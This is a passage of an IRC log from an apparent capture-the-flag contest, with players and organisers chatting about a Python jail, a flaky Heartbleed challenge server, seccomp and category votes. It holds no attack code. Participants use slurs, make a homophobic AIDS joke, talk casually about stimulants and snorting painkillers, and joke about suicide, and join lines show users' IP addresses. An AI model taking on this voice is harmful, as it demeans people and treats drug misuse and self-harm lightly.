  1440. (03:03:41) (tokki) #hyuna4evr
  1441. (03:03:46) (inter) suzi? who dat whore
  1442. (03:03:50) (inter) #hyuna
  1443. (03:03:55) ([CISSP]ibit) #slammed
  1444. (03:03:55) ••• jOin: (braoru) ([email protected])
  1445. (03:03:57) (synthverity) #Huehuena4evr
  1446. (03:03:59) ••• qUit: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Quit: Page closed
  1447. (03:04:02) ([CISSP]ibit) huehuehuehuehue
  1448. (03:04:03) ([CISSP]ibit) ja
  1449. (03:04:04) (inter) cash4told.com
  1450. (03:04:16) ([CISSP]ibit) damn
  1451. (03:04:25) ([CISSP]ibit) i only know one person on this irc
  1452. (03:04:29) ([CISSP]ibit) also i thikn i remember bobsteam
  1453. (03:04:32) ([CISSP]ibit) bobsteam did you do it last year
  1454. (03:04:34) (inter) dont you
  1455. (03:04:36) (inter) remember me?
  1456. (03:04:39) (inter) from ndh 2012?
  1457. (03:04:41) (tokki) *gasp*
  1458. (03:04:58) ([CISSP]ibit) :O
  1459. (03:05:00) (inter) been 2 years
  1460. (03:05:00) (inter) rofl
  1461. (03:05:03) (bobsteam) nope, I'm new this year :)
  1462. (03:05:05) ••• qUit: (aloha_) (76468068@gateway/web/freenode/ip.118.70.128.104) Ping timeout: 240 seconds
  1463. (03:05:06) ([CISSP]ibit) that cant have been me
  1464. (03:05:07) (inter) cuz i remember you
  1465. (03:05:08) (tokki) *gasp*
  1466. (03:05:18) ([CISSP]ibit) wat
  1467. (03:05:20) ([CISSP]ibit) is ndh
  1468. (03:05:21) ([CISSP]ibit) even
  1469. (03:05:24) (inter) you were trying to exchange keys with me
  1470. (03:05:27) (inter) and i said no
  1471. (03:05:28) ([CISSP]ibit) wat
  1472. (03:05:29) (bobsteam) but I feel good if people I don't know remember me :D
  1473. (03:05:32) (inter) jk
  1474. (03:05:34) ([CISSP]ibit) lmfao
  1475. (03:05:35) ••• jOin: (eQuiNoX___) ([email protected])
  1476. (03:05:42) (tokki) lol
  1477. (03:05:42) (tokki) nuit du hack
  1478. (03:05:42) ([CISSP]ibit) bobsteam dont even lie
  1479. (03:05:43) ([CISSP]ibit) were you like
  1480. (03:05:45) ([CISSP]ibit) at bsides
  1481. (03:05:48) ([CISSP]ibit) or csaw
  1482. (03:05:49) ([CISSP]ibit) or something
  1483. (03:05:52) (inter) or
  1484. (03:05:53) (inter) wait
  1485. (03:05:58) (inter) [CISSP]ibit were you at csaw
  1486. (03:05:59) (bobsteam) haha
  1487. (03:06:08) (inter) cuz if you were im pretty sure i talked to you before
  1488. (03:06:10) ([CISSP]ibit) i didn't go to csaw but i remoted
  1489. (03:06:20) (RPISEC) :>
  1490. (03:06:25) (inter) https://www.youtube.com/watch?v=em3npJ8Xf58
  1491. (03:06:28) (inter) good music
  1492. (03:06:32) ••• jOin: (nectoo) ([email protected])
  1493. (03:06:33) (inter) to listen to while playing ctf
  1494. (03:06:39) ••• jOin: (beugueuT4T) (4c871846ca@gateway/web/cgi-irc/kiwiirc.com/x-szfzakfsqubjpymb)
  1495. (03:06:45) (inter) and blazing couple kushrolls
  1496. (03:06:45) ([CISSP]ibit) is anyone still playin gthe ctf even
  1497. (03:06:51) (inter) im taking a break
  1498. (03:06:54) ([CISSP]ibit) im just fkn drinking and waiting fro pwn
  1499. (03:06:55) (inter) and studying my econ midterm
  1500. (03:06:56) (inter) in 11 hours
  1501. (03:07:02) (tokki) pwn pwn
  1502. (03:07:02) ([CISSP]ibit) lmao @ studying for skewl
  1503. (03:07:03) (bobsteam) good music http://www.youtube.com/watch?v=eh7lp9umG2I
  1504. (03:07:04) (tokki) good lick
  1505. (03:07:05) ([CISSP]ibit) fkn nerd damn
  1506. (03:07:05) ••• qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
  1507. (03:07:07) (inter) dude
  1508. (03:07:08) (bobsteam) will last for 11 hours
  1509. (03:07:10) (inter) fuck you
  1510. (03:07:12) ([CISSP]ibit) lol
  1511. (03:07:12) (inter) #ubc
  1512. (03:07:13) ([CISSP]ibit) :3
  1513. (03:07:14) (inter) #econ
  1514. (03:07:15) (inter) #sauder
  1515. (03:07:17) (inter) ggwp
  1516. (03:07:17) ([CISSP]ibit) lollll
  1517. (03:07:24) (inter) i actually
  1518. (03:07:26) (inter) managed to
  1519. (03:07:27) (inter) solve like
  1520. (03:07:28) ([CISSP]ibit) #canada
  1521. (03:07:28) (beugueuT4T) hey guys
  1522. (03:07:29) (tokki) skewl
  1523. (03:07:30) (inter) 2 problems other than
  1524. (03:07:32) (inter) pyjail
  1525. (03:07:36) (inter) and study for econ
  1526. (03:07:36) • tokki is on spring break
  1527. (03:07:37) (inter) rofl
  1528. (03:07:38) ([CISSP]ibit) did you solve pyjail
  1529. (03:07:39) ([CISSP]ibit) cause like
  1530. (03:07:40) (inter) no
  1531. (03:07:41) ([CISSP]ibit) its pissing me off
  1532. (03:07:42) (inter) fuck that problem
  1533. (03:07:44) (inter) i got pretty close
  1534. (03:07:45) ([CISSP]ibit) i got the reference
  1535. (03:07:46) (tokki) lol
  1536. (03:07:49) (beugueuT4T) i'm struggled with misc10
  1537. (03:07:50) ([CISSP]ibit) i can read/write files
  1538. (03:07:51) ([CISSP]ibit) ugh
  1539. (03:07:51) (inter) but then im stuck after
  1540. (03:07:53) (inter) yeah
  1541. (03:07:56) (inter) i got to the point
  1542. (03:08:06) (inter) where i can execute code to manipulate file io
  1543. (03:08:08) (inter) but then from there
  1544. (03:08:14) (inter) im like completely stuck
  1545. (03:08:24) ([CISSP]ibit) yeah
  1546. (03:08:27) (beugueuT4T) do i have to do with flippo
  1547. (03:08:30) ([CISSP]ibit) the lock
  1548. (03:08:32) ([CISSP]ibit) is fucking w/ me
  1549. (03:08:34) (inter) dude
  1550. (03:08:39) (inter) del __builtins__
  1551. (03:08:39) ([CISSP]ibit) and i cant get a reference to the lock members
  1552. (03:08:40) (inter) who the fuck
  1553. (03:08:41) (inter) does that
  1554. (03:08:44) ([CISSP]ibit) ASSHOLES
  1555. (03:08:46) (inter) probably only clockish
  1556. (03:08:46) ([CISSP]ibit) ASSHOLES DO IT
  1557. (03:08:50) (inter) ooh
  1558. (03:08:57) (inter) clockish, [CISSP]ibit just called you an asshole
  1559. (03:09:01) (inter) disqualify him :-)
  1560. (03:09:02) ([CISSP]ibit) ^
  1561. (03:09:05) ([CISSP]ibit) :)
  1562. (03:09:10) ([CISSP]ibit) luv u babez
  1563. (03:09:14) ••• jOin: (copyleft_) ([email protected])
  1564. (03:09:14) (inter) bbz
  1565. (03:09:18) (inter) but then
  1566. (03:09:20) (+clockish) conratz to 0xffa for RSA solve!
  1567. (03:09:23) (inter) this econ final tho
  1568. (03:09:35) (inter) im trying to memorize graphs
  1569. (03:09:37) ••• qUit: (MaaaZ) ([email protected]) Ping timeout: 255 seconds
  1570. (03:09:40) (+clockish) inter: Why, he's right?
  1571. (03:09:41) (tokki) moniez
  1572. (03:09:42) (inter) and i cant
  1573. (03:09:47) (inter) do it
  1574. (03:09:52) (inter) im not blazed enough
  1575. (03:09:52) (inter) to study
  1576. (03:09:56) (inter) and its like 1 am
  1577. (03:09:57) (tokki) lol
  1578. (03:10:00) (inter) no dealers nearby
  1579. (03:10:01) ([CISSP]ibit) lma
  1580. (03:10:01) ([CISSP]ibit) o
  1581. (03:10:08) ([CISSP]ibit) its 4 here
  1582. (03:10:38) (inter) i kind of want to pop adderall
  1583. (03:10:39) (tokki) it's noon here
  1584. (03:10:45) ([CISSP]ibit) i did
  1585. (03:10:45) (inter) but i dont have those too
  1586. (03:10:46) ([CISSP]ibit) ealier
  1587. (03:10:48) ([CISSP]ibit) wait
  1588. (03:10:49) ([CISSP]ibit) no id idnt
  1589. (03:10:52) ([CISSP]ibit) shh
  1590. (03:10:57) (inter) and
  1591. (03:10:59) ••• qUit: (hogehoge_) ([email protected]) Ping timeout: 240 seconds
  1592. (03:10:59) (inter) i see my roomie
  1593. (03:11:04) (inter) snorting painkillers
  1594. (03:11:10) (+cai_) nice 0xffa
  1595. (03:11:19) (+cai_) people get to vote again >:-)
  1596. (03:11:21) (inter) im never snorting anything in my life
  1597. (03:11:22) ([CISSP]ibit) YES
  1598. (03:11:24) ([CISSP]ibit) PWN
  1599. (03:11:24) ([CISSP]ibit) PWN
  1600. (03:11:25) ([CISSP]ibit) PWN
  1601. (03:11:25) (bobsteam) inter you have final tomorrow?
  1602. (03:11:29) (inter) yeah
  1603. (03:11:29) ••• qUit: (kris) ([email protected]) Ping timeout: 276 seconds
  1604. (03:11:31) (inter) in 11 hours
  1605. (03:11:33) (inter) respectively
  1606. (03:11:36) ([CISSP]ibit) VOTE 2
  1607. (03:11:36) ([CISSP]ibit) VOTE 2
  1608. (03:11:38) ([CISSP]ibit) PLZ
  1609. (03:11:40) (inter) and i want to put 4 hours of sleeping in between
  1610. (03:11:41) (bobsteam) damn, saturday? lame ;c
  1611. (03:11:49) ([CISSP]ibit) does canada have saturdays?
  1612. (03:11:50) (inter) yep
  1613. (03:11:52) (inter) my prof
  1614. (03:11:54) (inter) is a dick
  1615. (03:11:57) (inter) but its 12pm exam
  1616. (03:11:57) ([CISSP]ibit) the mroe you know ig uess
  1617. (03:11:59) (inter) so its about right
  1618. (03:12:11) (bobsteam) lol
  1619. (03:12:41) (tokki) how do you guys know what category each number stands for?
  1620. (03:12:43) (inter) [CISSP]ibit est cissp a Montreal?
  1621. (03:12:58) ([CISSP]ibit) x_x
  1622. (03:13:00) (inter) or are you guys straight up english
  1623. (03:13:04) ••• qUit: (potato__) ([email protected]) Remote host closed the connection
  1624. (03:13:06) ([CISSP]ibit) whats a cssp even
  1625. (03:13:09) ([CISSP]ibit) im us
  1626. (03:13:11) ([CISSP]ibit) of a
  1627. (03:13:11) ••• qUit: (ImtheMuscleTyler) ([email protected])
  1628. (03:13:13) ([CISSP]ibit) nyx
  1629. (03:13:15) ([CISSP]ibit) ny
  1630. (03:13:15) ([CISSP]ibit) c
  1631. (03:13:17) ([CISSP]ibit) rep
  1632. (03:13:28) (inter) is
  1633. (03:13:29) (inter) cissp
  1634. (03:13:29) (inter) in
  1635. (03:13:30) (tokki) ooh
  1636. (03:13:31) (inter) montreal?
  1637. (03:13:36) (inter) straight up translation
  1638. (03:13:40) (inter) my french is horrible sorry
  1639. (03:13:48) ([CISSP]ibit) je suis la joun fis
  1640. (03:13:50) ([CISSP]ibit) ;)
  1641. (03:14:01) (inter) ooh
  1642. (03:14:02) (bobsteam) WHAT'S GOING ON!?
  1643. (03:14:05) (bobsteam) AND I SAY
  1644. (03:14:11) (bobsteam) HEEEYEYYYYYYYYYY YEA YEA YEA
  1645. (03:14:12) (tokki) je ne parle pas francais!
  1646. (03:14:13) (inter) vous devez
  1647. (03:14:13) (tokki) lol
  1648. (03:14:16) (bobsteam) WHATS GOING ON
  1649. (03:14:17) (+frozencemetery) JE SUIS UN BEAR
  1650. (03:14:19) (synthverity) Bullshit
  1651. (03:14:20) (tokki) lol
  1652. (03:14:25) ([CISSP]ibit) un souris dans le sal de clas
  1653. (03:14:28) (sven) MOONSPEAK!
  1654. (03:14:32) ([CISSP]ibit) in the gay community
  1655. (03:14:34) ([CISSP]ibit) i'm known as a daddy
  1656. (03:14:35) ([CISSP]ibit) and a bear
  1657. (03:14:37) ([CISSP]ibit) im a daddy bear
  1658. (03:14:38) (tokki) :O
  1659. (03:14:47) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 240 seconds
  1660. (03:14:48) (inter) the anal is real
  1661. (03:14:48) (synthverity) That's hot
  1662. (03:14:59) ••• jOin: (kris) ([email protected])
  1663. (03:15:00) (bobsteam) ano, sumimasen ga nani o hanashimataka
  1664. (03:15:09) ([CISSP]ibit) o
  1665. (03:15:11) ([CISSP]ibit) ja
  1666. (03:15:11) (tokki) is that japanese :O
  1667. (03:15:13) (inter) wata shi wa
  1668. (03:15:16) (synthverity) But I don't want the AIDS, so get the fuck away from me
  1669. (03:15:20) ([CISSP]ibit) ni hao ma
  1670. (03:15:22) ([CISSP]ibit) wo hao ni ne
  1671. (03:15:22) (tokki) STD
  1672. (03:15:24) ([CISSP]ibit) zaitien
  1673. (03:15:25) (inter) dude
  1674. (03:15:25) (bobsteam) hai nihonga desu
  1675. (03:15:26) (inter) DUDE
  1676. (03:15:29) (inter) I learned
  1677. (03:15:30) (inter) chinese
  1678. (03:15:30) (tokki) :O
  1679. (03:15:32) (bobsteam) it was japanaese not hciniese
  1680. (03:15:34) (inter) through playing battlefield 4
  1681. (03:15:35) ([CISSP]ibit) i learned it for like 2 weeks
  1682. (03:15:36) ([CISSP]ibit) i know
  1683. (03:15:36) ([CISSP]ibit) bob
  1684. (03:15:38) (tokki) lol
  1685. (03:15:39) ([CISSP]ibit) but thats the best i can do
  1686. (03:15:40) ([CISSP]ibit) ok
  1687. (03:15:40) (inter) QUAI QU NA
  1688. (03:15:42) (inter) ZHE SHI NI DE
  1689. (03:15:42) (bobsteam) ok fine
  1690. (03:15:46) ([CISSP]ibit) why
  1691. (03:15:48) ([CISSP]ibit) you gotta call me out like that
  1692. (03:15:49) ([CISSP]ibit) im trying my best
  1693. (03:15:50) (inter) XIE XIE LE YI SHENG
  1694. (03:15:53) (tokki) is this like language learning time
  1695. (03:16:00) (inter) play battlefield 4 guys
  1696. (03:16:02) (inter) its best for chiense
  1697. (03:16:11) (tokki) lol
  1698. (03:16:13) ••• jOin: (nvs) (6adc5033@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.80.51)
  1699. (03:16:23) (inter) ok fuck
  1700. (03:16:26) (inter) im losing my concentration
  1701. (03:16:35) (bobsteam) its 1 am
  1702. (03:16:43) (synthverity) Who the fuck was concentrating?
  1703. (03:16:45) (tokki) lol
  1704. (03:16:46) ([CISSP]ibit) ^
  1705. (03:16:48) (+cai_) nice RDot for getting Kpop super fast :)
  1706. (03:16:51) (+frozencemetery) OH HELL YES
  1707. (03:16:57) ([CISSP]ibit) hey can i have a + in my name
  1708. (03:16:59) (synthverity) I'm fucking out of it, and have been for a while
  1709. (03:17:01) (tokki) lol
  1710. (03:17:13) (+cai_) you get to vote yet again
  1711. (03:17:18) ([CISSP]ibit) YES
  1712. (03:17:18) ([CISSP]ibit) 2
  1713. (03:17:19) ([CISSP]ibit) VOTE 2
  1714. (03:17:25) (bobsteam) oh my god do I pray, I pray every single day, NYAAAAAAAAAAAAA for this institution
  1715. (03:17:29) ([CISSP]ibit) WAIT
  1716. (03:17:29) ([CISSP]ibit) VOTE 1
  1717. (03:17:32) ([CISSP]ibit) VOTE 1 PLZZ OMGZ
  1718. (03:17:32) (tokki) how do you know which number you should vote for?
  1719. (03:17:39) ([CISSP]ibit) and he tries
  1720. (03:17:41) ([CISSP]ibit) OH MY GOD DO I TRY
  1721. (03:17:44) ([CISSP]ibit) I TRY ALL THE TIME
  1722. (03:17:44) (doom) UP
  1723. (03:17:44) (doom) UP
  1724. (03:17:45) (doom) UP
  1725. (03:17:46) (tokki) YES YOU DO
  1726. (03:17:46) (doom) UP
  1727. (03:17:47) (doom) START
  1728. (03:17:48) (+cai_) lol
  1729. (03:17:48) (doom) START
  1730. (03:17:50) (doom) UP
  1731. (03:17:51) (bobsteam) :D
  1732. (03:17:54) ([CISSP]ibit) d
  1733. (03:17:54) ([CISSP]ibit) d
  1734. (03:17:55) ([CISSP]ibit) b
  1735. (03:17:55) ([CISSP]ibit) b
  1736. (03:17:58) (+cai_) 2 will get you the chance card
  1737. (03:18:01) (tokki) db
  1738. (03:18:03) (tokki) wat
  1739. (03:18:06) (tokki) :O
  1740. (03:18:10) ([CISSP]ibit) if i dont get pwnables 100
  1741. (03:18:12) ([CISSP]ibit) ill kill myself
  1742. (03:18:14) ([CISSP]ibit) that blood is on your hands
  1743. (03:18:15) ([CISSP]ibit) so
  1744. (03:18:17) (tokki) me too
  1745. (03:18:17) (synthverity) Pwnables!!!!!!!!!!!
  1746. (03:18:18) ([CISSP]ibit) just saying
  1747. (03:18:22) ([CISSP]ibit) rip
  1748. (03:18:23) (tokki) pwnables ftw
  1749. (03:18:23) ([CISSP]ibit) etc
  1750. (03:18:25) ([CISSP]ibit) ^
  1751. (03:18:26) (tokki) rip
  1752. (03:18:57) (tokki) our team has one point
  1753. (03:18:59) ([CISSP]ibit) do i listen to triple baka 10 hour or heyeyeyeyeyee 10 hour
  1754. (03:18:59) ([CISSP]ibit) idk
  1755. (03:19:03) ([CISSP]ibit) hours has 21 lol
  1756. (03:19:06) ([CISSP]ibit) we've been on pyjail
  1757. (03:19:07) ([CISSP]ibit) 4eva
  1758. (03:19:08) (tokki) are they goddamn serious
  1759. (03:19:09) ([CISSP]ibit) but its only like 3 of us
  1760. (03:19:14) (doom) I don't get voting
  1761. (03:19:28) (tokki) ya me neither
  1762. (03:19:36) ••• jOin: (razvanc) ([email protected])
  1763. (03:19:47) (+frozencemetery) voting is easy! The people who agree with you vote one way and the people who are wrong vote in other ways
  1764. (03:19:48) ([CISSP]ibit) is it pwn
  1765. (03:19:49) ([CISSP]ibit) did we get pwn
  1766. (03:19:55) ([CISSP]ibit) did we
  1767. (03:19:56) ([CISSP]ibit) get pwn
  1768. (03:19:57) ([CISSP]ibit) :|
  1769. (03:20:07) (doom) Which one do we vote for
  1770. (03:20:09) (doom) for pwnables
  1771. (03:20:09) (doom) :>
  1772. (03:20:09) ([CISSP]ibit) pwn
  1773. (03:20:10) ([CISSP]ibit) 1
  1774. (03:20:10) (tokki) :|
  1775. (03:20:11) ([CISSP]ibit) 1
  1776. (03:20:12) (synthverity) 1
  1777. (03:20:12) ([CISSP]ibit) vote 1
  1778. (03:20:13) (synthverity) 1
  1779. (03:20:13) ([CISSP]ibit) :s
  1780. (03:20:13) (synthverity) 1
  1781. (03:20:14) ([CISSP]ibit) :x
  1782. (03:20:15) ([CISSP]ibit) 1
  1783. (03:20:15) (tokki) chance 2
  1784. (03:20:17) (tokki) 2
  1785. (03:20:17) ([CISSP]ibit) NO 1
  1786. (03:20:19) ([CISSP]ibit) DO 1
  1787. (03:20:19) (tokki) 2
  1788. (03:20:19) (synthverity) Please!
  1789. (03:20:21) ([CISSP]ibit) FML
  1790. (03:20:22) (doom) UP
  1791. (03:20:24) (doom) LEFT
  1792. (03:20:24) ([CISSP]ibit) TOKKI
  1793. (03:20:25) ([CISSP]ibit) Y
  1794. (03:20:25) (doom) LEFT
  1795. (03:20:27) (doom) LEFT
  1796. (03:20:27) (tokki) jk
  1797. (03:20:28) ([CISSP]ibit) NOPLZ
  1798. (03:20:28) (tokki) 2
  1799. (03:20:32) ([CISSP]ibit) im
  1800. (03:20:33) ([CISSP]ibit) crying
  1801. (03:20:33) ([CISSP]ibit) plz
  1802. (03:20:34) (synthverity) Fucking chance just rolls again!
  1803. (03:20:35) (tokki) 2
  1804. (03:20:38) ([CISSP]ibit) plz
  1805. (03:20:40) ([CISSP]ibit) tokki
  1806. (03:20:42) ([CISSP]ibit) y
  1807. (03:20:47) (synthverity) It's the worst you can possibly do
  1808. (03:20:48) (tokki) k
  1809. (03:20:50) (tokki) 1
  1810. (03:20:53) (+frozencemetery) [CISSP]ibit: please stop spamming the channel
  1811. (03:20:54) (+cai_) yes, chance gets you to roll again
  1812. (03:20:55) ([CISSP]ibit) :3
  1813. (03:20:57) (bobsteam) omg whatscat is so cat
  1814. (03:21:02) ([CISSP]ibit) :O
  1815. (03:21:05) (tokki) much cat
  1816. (03:21:20) (doom) DEP/ASLR on the pwnables?
  1817. (03:21:25) (tokki) :O
  1818. (03:21:38) ([CISSP]ibit) they never use ASLR
  1819. (03:21:41) (+frozencemetery) doom: answer is usually on
  1820. (03:21:53) ••• qUit: (kris) ([email protected]) Ping timeout: 276 seconds
  1821. (03:22:08) ([CISSP]ibit) ASLR? or just DEP?
  1822. (03:22:11) ([CISSP]ibit) last year none of them had ASLR iirc
  1823. (03:22:13) (doom) yeah figured as much
  1824. (03:22:43) ••• jOin: (stk|) ([email protected])
  1825. (03:22:44) ••• qUit: (nectoo) ([email protected]) Ping timeout: 252 seconds
  1826. (03:24:12) ••• jOin: (zeb23) ([email protected])
  1827. (03:24:31) • tokki dies
  1828. (03:25:00) (chuckleberry) heartbleed server very unreliable
  1829. (03:25:02) (chuckleberry) :(
  1830. (03:25:08) ••• qUit: (sdfsfdsfd) ([email protected]) Ping timeout: 276 seconds
  1831. (03:25:45) (tokki) is the heartbleed server supposed to refuse your connection?
  1832. (03:25:50) (chuckleberry) no
  1833. (03:25:54) (inter) what if i told you no
  1834. (03:25:56) (chuckleberry) at least, i don't think so
  1835. (03:25:59) (inter) and what if clockish told you no
  1836. (03:26:05) (tokki) *gasp*
  1837. (03:26:16) ••• jOin: (zoff_ita) ([email protected])
  1838. (03:26:18) (reanimus) it dies a lot
  1839. (03:26:20) (reanimus) lol
  1840. (03:26:24) (+cai_) tokki: if you get connection refused, you should try other ports
  1841. (03:26:29) (tokki) ok :)
  1842. (03:26:46) (arthurdent) lol
  1843. (03:26:54) (+frozencemetery) heartbleed is sketchy and therefore isn't allowed to have a non-sketchy server ;)
  1844. (03:27:00) ••• jOin: (f00b4r_) ([email protected])
  1845. (03:27:19) ••• jOin: (deject3d) ([email protected])
  1846. (03:27:25) (+clockish) tokki: as it says in the description, try a few different ports.
  1847. (03:27:31) (deject3d) ok who is screwing with the reeeekeee chall
  1848. (03:27:39) (arthurdent) i just keep getting an error when the connection is successful
  1849. (03:27:43) (tokki) clockish: yup :)
  1850. (03:27:44) (deject3d) "touch poop"
  1851. (03:27:47) (deject3d) rly
  1852. (03:27:52) (tokki) poo
  1853. (03:27:58) ••• qUit: (eQuiNoX___) ([email protected]) Quit: eQuiNoX___
  1854. (03:28:00) (+cai_) grats beollejavi for getting kpop :)
  1855. (03:28:00) ([CISSP]ibit) pup
  1856. (03:28:11) (tokki) puppy
  1857. (03:28:44) (+clockish) tokki: also I accidentally just killed it
  1858. (03:28:52) (+clockish) so hold on a sec
  1859. (03:28:56) ••• qUit: (Sin__) ([email protected]) Quit: Sin__
  1860. (03:29:06) (+cai_) voting ends in 8 minutes
  1861. (03:29:36) (tokki) clockish: ahahaha kk
  1862. (03:29:47) (+clockish) I thought I could make it better
  1863. (03:29:51) (+clockish) I forkbomed myself
  1864. (03:29:55) (tokki) :O
  1865. (03:30:23) ••• qUit: (factoreal) ([email protected]) Ping timeout: 240 seconds
  1866. (03:31:02) (LuckyY) WTF
  1867. (03:31:04) (pipecork) clockish: classic
  1868. (03:31:07) (LuckyY) the scoreboard has 2 sides
  1869. (03:31:13) (tokki) wat
  1870. (03:31:16) ([CISSP]ibit) lmfao
  1871. (03:31:28) ([CISSP]ibit) what did you fork bomb?
  1872. (03:31:33) (+clockish) heartbleed
  1873. (03:31:52) ••• jOin: (WhizzMan) ([email protected])
  1874. (03:32:11) ••• jOin: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173)
  1875. (03:32:34) (tokki) y have i seen all these nicknames somewhere
  1876. (03:33:11) ••• jOin: (factoreal) ([email protected])
  1877. (03:33:18) ([CISSP]ibit) which
  1878. (03:33:35) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 240 seconds
  1879. (03:33:36) (tokki) the people that just joined
  1880. (03:33:44) ([CISSP]ibit) idk them :x
  1881. (03:34:03) (sven) problem hanindling SSL record packet - wrong type?
  1882. (03:34:06) (sven) fail
  1883. (03:34:21) (tokki) just found out our team is registered as north korea
  1884. (03:34:36) (tokki) :D
  1885. (03:35:00) (pipecork) wow so many teams from north korea
  1886. (03:35:04) (synthverity) Best Korea?
  1887. (03:35:04) (pipecork) such an original joke
  1888. (03:35:11) (pipecork) ha ha ha
  1889. (03:35:20) (arthurdent) hehe
  1890. (03:35:33) (arthurdent) tokki: what team?
  1891. (03:35:34) (poppopret) is there a reliable port that heartbleed works on?
  1892. (03:35:38) (+cai_) voting ends in a minute
  1893. (03:35:49) (+cai_) poppopret: not really, just try random ports
  1894. (03:35:51) (synthverity) Vote 1
  1895. (03:35:52) (+clockish) poppopret It's down right now, working on it
  1896. (03:35:54) (tokki) arthurdent: LeaveRet
  1897. (03:35:55) (synthverity) Vote 1
  1898. (03:35:58) (synthverity) Please
  1899. (03:36:08) (+cai_) seems like it's going to be 1 :)
  1900. (03:36:09) (+clockish) cai_: TIL: AWS cannot kill forkbomed servers
  1901. (03:36:11) (synthverity) And thank you
  1902. (03:36:11) (tokki) :D
  1903. (03:36:16) (arthurdent) tokki: is that a university group?
  1904. (03:36:33) (tokki) arthurdent: nope, random teenage group :p
  1905. (03:37:07) (synthverity) Random Teenage Mutant Group? Of tortoises?
  1906. (03:37:16) (tokki) lol ya
  1907. (03:37:18) (+cai_) clockish: dang..
  1908. (03:37:18) (+cai_) force shutdown doesn't work?
  1909. (03:37:19) (+cai_) pwnable 100 is open
  1910. (03:37:21) (chuckleberry) don't know if server is fucked or if connection time outs is part of the challenge :(
  1911. (03:37:23) (tokki) :D
  1912. (03:37:31) (tokki) lets pwn
  1913. (03:37:35) ••• jOin: (jakemask) ([email protected])
  1914. (03:37:48) ••• qUit: (jakemask) ([email protected]) Client Quit
  1915. (03:37:50) (+cai_) chuckleberry: which one
  1916. (03:37:53) ••• jOin: (xire_) ([email protected])
  1917. (03:37:58) (x7r0n) how did tomcr00se get 41 ? is ther any challenge with 20pts other than crypto-20 which i dint see
  1918. (03:37:59) (x7r0n) ?
  1919. (03:38:04) ([CISSP]ibit) PWNABLES
  1920. (03:38:07) (synthverity) YEA!!!
  1921. (03:38:09) (chuckleberry) cai_: the onion service for rendezvous?
  1922. (03:38:14) (chuckleberry) available?
  1923. (03:38:20) (+cai_) it should be running fine
  1924. (03:38:20) ••• qUit: (RPISEC) (807163f2@gateway/web/cgi-irc/kiwiirc.com/ip.128.113.99.242) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  1925. (03:38:27) (chuckleberry) ok
  1926. (03:38:28) ([CISSP]ibit) making instant ramen noodles
  1927. (03:38:31) (chuckleberry) thx
  1928. (03:38:41) (+cai_) x7r0n: probably through breakthrough points?
  1929. (03:39:02) (x7r0n) wats that ke bonus for solving faster ?
  1930. (03:39:11) (+cai_) it's 4%, 2%, 1% for first, second, and third blood, respectively
  1931. (03:39:12) ••• qUit: (altf4) ([email protected]) Quit: Leaving
  1932. (03:39:20) (deject3d) hey can i report a challenge bug in a pm to an op instead of email
  1933. (03:39:24) (+cai_) i should've put that in the rules, oh well
  1934. (03:39:25) (x7r0n) oh gotcha :-)
  1935. (03:39:30) (poppopret) isn't it like 4 am @ CMU?
  1936. (03:39:33) (+cai_) sorry about it not being clear
  1937. (03:39:35) (poppopret) you guys don't sleep? lol
  1938. (03:39:41) (+cai_) yeah it's almost 5 am here
  1939. (03:39:45) (Yen1) could web300 get poked?
  1940. (03:39:49) (inter) cai_ woke up from his nap
  1941. (03:39:50) ([CISSP]ibit) PWNABLES USES SECCOMP WHAT??
  1942. (03:40:00) (+cai_) some of us are sleeping, so we have organizers when i'm sleeping :p
  1943. (03:40:02) (tokki) dang
  1944. (03:40:12) (+cai_) i didn't sleep yet, although i plan to go to bed soon
  1945. (03:40:19) ••• qUit: (nvs) (6adc5033@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.80.51) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  1946. (03:40:21) (+clockish) oh hey it's my seccomp problem
  1947. (03:40:24) (+cai_) lol
  1948. (03:40:24) ([CISSP]ibit) ./tenement: error while loading shared libraries: libseccomp.so.2: cannot open shared object file: No such file or directory
  1949. (03:40:25) ••• qUit: (chunderstruck1) ([email protected]) Quit: Leaving.
  1950. (03:40:29) ([CISSP]ibit) clockish
  1951. (03:40:30) ([CISSP]ibit) i love you man
  1952. (03:40:38) (+clockish) err wait
  1953. (03:40:41) (+clockish) it's not
  1954. (03:40:43) (+clockish) i said nothing
  1955. (03:40:45) (inter) clockish: im on a mac brah
  1956. (03:40:49) (inter) elf 32bit linux?
  1957. (03:40:50) (inter) homie
  1958. (03:40:51) (inter) what dat
  1959. (03:40:52) (tokki) lol
  1960. (03:40:54) (inter) WHAT DAT?
  1961. (03:40:54) (tokki) ikr
  1962. (03:41:25) (arthurdent) inter: your linux has elfs in it? i hear that's normal
  1963. (03:41:42) (arthurdent) but you still might want to get it checked out
  1964. (03:41:56) (inter) i have elfs in my house
  1965. (03:41:56) (razvanc) so the heartbleed is down now?
  1966. (03:42:01) (arthurdent) seems that way
  1967. (03:42:09) (arthurdent) i can't connect to any ports anymore
  1968. (03:42:13) (tokki) ftw
  1969. (03:42:18) (Aegil) If its finnish elfs in your linux, you need to look after them or they cause mischeif, or so the stories go
  1970. (03:42:18) (+cai_) yeah it's down
  1971. (03:42:22) (namrog84) fafgerwsafsdsd
  1972. (03:42:23) ([CISSP]ibit) is the libseccomp error intentional
  1973. (03:42:24) ([CISSP]ibit) ?
  1974. (03:42:26) (Aegil) usually sauna elfs :)
  1975. (03:42:29) ([CISSP]ibit) cuz my system supports seccomp :|
  1976. (03:42:39) (beugueuT4T) where is the second mao?
  1977. (03:42:43) (inter) [CISSP]ibit is rich
  1978. (03:42:46) (inter) rich boi
  1979. (03:42:47) ••• qUit: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41) Quit: Page closed
  1980. (03:42:52) ([CISSP]ibit) heh
  1981. (03:42:57) ••• jOin: (Redford) ([email protected])
  1982. (03:43:08) (inter) i personally was looking forward to crypto problems
  1983. (03:43:26) (inter) but there arent that many this year :/
  1984. (03:43:34) (+cai_) we are rebooting heartbleed server. should be back soon
  1985. (03:44:27) (warrick) mod available for web300 question?
  1986. (03:45:02) ([CISSP]ibit) u guys are kilin me
